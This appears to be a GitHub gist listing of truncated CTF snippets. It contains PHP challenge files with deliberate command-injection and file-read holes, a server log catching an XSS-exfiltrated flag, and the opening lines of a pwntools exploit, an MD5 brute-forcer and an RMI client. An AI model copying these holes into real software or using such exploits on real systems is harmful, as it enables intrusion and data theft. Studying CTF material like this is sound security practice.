This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| O:4:"User":2:{s:4:"name";s:5:"honor";s:11:"Usertoken";s:32:"0fb3fd5e3a65707c85568cfa566c9731";} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| {"output":"<?php\n\nheader('Content-Type: application\/json');\n\nif ($file = @$_GET['get']) {\n $output = shell_exec(\"cat '$file'\");\n \n if ($output !== null) {\n echo json_encode([\n 'output' => $output\n ]);\n } else {\n echo json_encode([\n 'error' => 'cannot get file'\n ]);\n }\n} else {\n echo json_encode([\n 'error' => 'empty file path'\n ]);\n}\n"} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| function run() { | |
| if (isset($_GET['cmd']) && isset($_GET['sig'])) { | |
| $cmd = hash('SHA512', $_SERVER['REMOTE_ADDR']) ^ (string) $_GET['cmd']; | |
| $key = $_SERVER['HTTP_USER_AGENT'].sha1($_SERVER['HTTP_HOST']); // user agent + sha1(request header) | |
| echo "user agent:".$_SERVER['HTTP_USER_AGENT']."\n"; | |
| echo "http_host:".$_SERVER['HTTP_HOST']."\n"; | |
| echo "remote_addr:".$_SERVER['REMOTE_ADDR']."\n"; | |
| $sig = hash_hmac('SHA512', $cmd, $key); | |
| echo "sig:".$sig."\n"; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| FLAG{PikAPikApikaPikap1Ka} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php if (isset($_GET['info'])) die(phpinfo()); | |
| $filename = $_GET['f']??"kophp.php"; | |
| if (isset($_GET['c']) && strlen($_GET['c']) < 87) | |
| { | |
| $f = "/tmp/" . uniqid(rand() , true); | |
| if (stripos($_GET['c'], "path")) exit(); | |
| file_put_contents($f, $_GET['c']); | |
| die($f); | |
| } | |
| strtolower($filename[0]) == "p" ? die("Bad 🍊!") : die(htmlspecialchars(file_get_contents($filename))); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@whcsc-ubuntu-16:~# php -S 0.0.0.0:808 -t ./ | |
| PHP 7.0.33-0ubuntu0.16.04.7 Development Server started at Sun Jan 12 05:08:29 2020 | |
| Listening on http://0.0.0.0:808 | |
| Document root is /root | |
| Press Ctrl-C to quit. | |
| [Sun Jan 12 05:17:55 2020] 140.113.216.163:58874 [200]: /flag=FLAG%7Bu_r_m3ow_xss_m4ster%7D |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #coding=utf-8 | |
| from Crypto.Hash import MD5 | |
| import sys | |
| target = sys.argv[1] | |
| count = 0 | |
| while 1: | |
| h = MD5.new() | |
| h.update('kaibro{}'.format(count)) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| context(arch='amd64',log_level='debug') | |
| r = remote('eductf.zoolab.org', 10105 ) | |
| binary = ELF('impossible') | |
| libc = ELF('./libc-2.27.so') | |
| r.sendlineafter( ': ' , str(-2147483648)) | |
| magic = 0x10a38c |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package com.kaibro.rmi; | |
| import java.rmi.registry.LocateRegistry; | |
| import java.rmi.registry.Registry; | |
| public class Client { | |
| public static void main(String[] args) { | |
| String host = "140.113.203.209"; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| include_once('flag.php'); | |
| echo strlen($fllllllag) . "\n"; | |
| if ((isset($_POST['😂']) and isset($_POST['🤣']) and isset($_GET['KEY'])) or isset($_GET['is_this_flag?'])){ | |
| echo "A:".$_POST['😂']."\n"; | |
| echo "B:".$_POST['🤣']."\n"; | |
| echo "C:".$_POST['😂']."\n"; | |
| echo "D:".$_POST['🤣']."\n"; | |
| srand(20191231 + 20200101 + time()); | |
| $mystr = 'Happy'; |
NewerOlder